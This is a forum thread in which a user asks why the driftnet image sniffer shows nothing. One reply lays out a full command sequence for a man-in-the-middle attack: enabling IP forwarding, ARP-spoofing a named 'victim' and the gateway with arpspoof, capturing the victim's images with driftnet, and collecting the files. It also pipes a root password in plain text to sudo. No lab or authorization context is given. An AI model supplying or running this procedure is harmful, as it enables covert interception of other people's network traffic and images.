Author Topic: problem with drifnet  (Read 4293 times)

berghem

  • Jr. Member
  • **
  • Posts: 97
    • View Profile
    • http://lorenzistefano.com
on: July 24, 2012, 06:59:10 AM
hi all
  i tried use drifnet tool, but I have some problems...
i wrote this command in shell
sudo drifnet -i wlan0
after I open firefox and i loaded some pages with picture, but drifnet windows was empty

Can you help me?



utqual

  • Newbie
  • *
  • Posts: 37
    • View Profile
Reply #1 on: July 24, 2012, 11:02:25 AM
Are you trying to sniff the traffic of your computer or other host? If you want to sniff packets from another host connected to your network you must first start an arp spoofing session with ettercap or arpspoof



berghem

  • Jr. Member
  • **
  • Posts: 97
    • View Profile
    • http://lorenzistefano.com
Reply #2 on: July 24, 2012, 01:26:21 PM
I only tried with my host. I haven't other host in this moment....


utqual

  • Newbie
  • *
  • Posts: 37
    • View Profile
Reply #3 on: July 24, 2012, 02:33:27 PM
it's strange, it works for me... I don't know, wait for the replies of the other users



ostendali

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 580
    • View Profile
Reply #4 on: July 24, 2012, 04:09:36 PM
we have noticed nothing unusual on this app, so there might be some of your custom setting over your system.
will suggest to reinstall your app and remove anything related in your home dir.



r083rt

  • Guest
Reply #5 on: July 24, 2012, 04:47:10 PM
Sill question are you using arpspoof ??

please post your full method as sudo driftnet -i wlan0 will just not cut the mustard  you have left out steps of this procedure


1 ) sudo { remove from commands below if your using root }
2 ) echo "password" | sudo -S { remove from commands below if your using root }

Code: [Select]
sudo mkdir /tmp/driftnet
sudo mkdir $HOME/driftnet
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t target gateway
sudo driftnet  -a -i wlan0 -d /tmp/driftnet

replace target with the victims ipand gateway with your gateway

to get your gateway type
Code: [Select]
ip route show default | awk '/default/ {print $3 }'


Code: [Select]
echo "password" | sudo -S find /tmp/driftnet -type f -name "*.*" -exec mv {} $HOME/driftnet \;
replace password with the password you have setup for root

then close driftnet , disbale ipfoward and stop arpspoof
Code: [Select]
sudo pkill driftnet
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo pkill arpspoof

and the pictures will be in a driftnet folder in your user folder

if you want to remove some junk files like gifs and pngs depending on the items you want to keep then do
Code: [Select]
echo "password" | sudo -S find $HOME/driftnet -type f -name "*.gif*" -exec rm {}  \;
echo "password" | sudo -S find $HOME/driftnet -type f -name "*.png*" -exec rm {}  \;

replace password with the password you have setup for root

r083rt
« Last Edit: July 24, 2012, 05:21:22 PM by r083rt »



weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Reply #6 on: July 24, 2012, 05:00:19 PM
Hi berghem, if can be useful for you, when i use driftnet i put -a option that save images in tmp/ folder otherwise i see only a blck screen, then i open images with xdg-open, so the command result something like:
Code: [Select]
driftnet -a -v -i wlan0 you can try it with some vm...

una voce libera รจ sempre liberatrice
under_r00t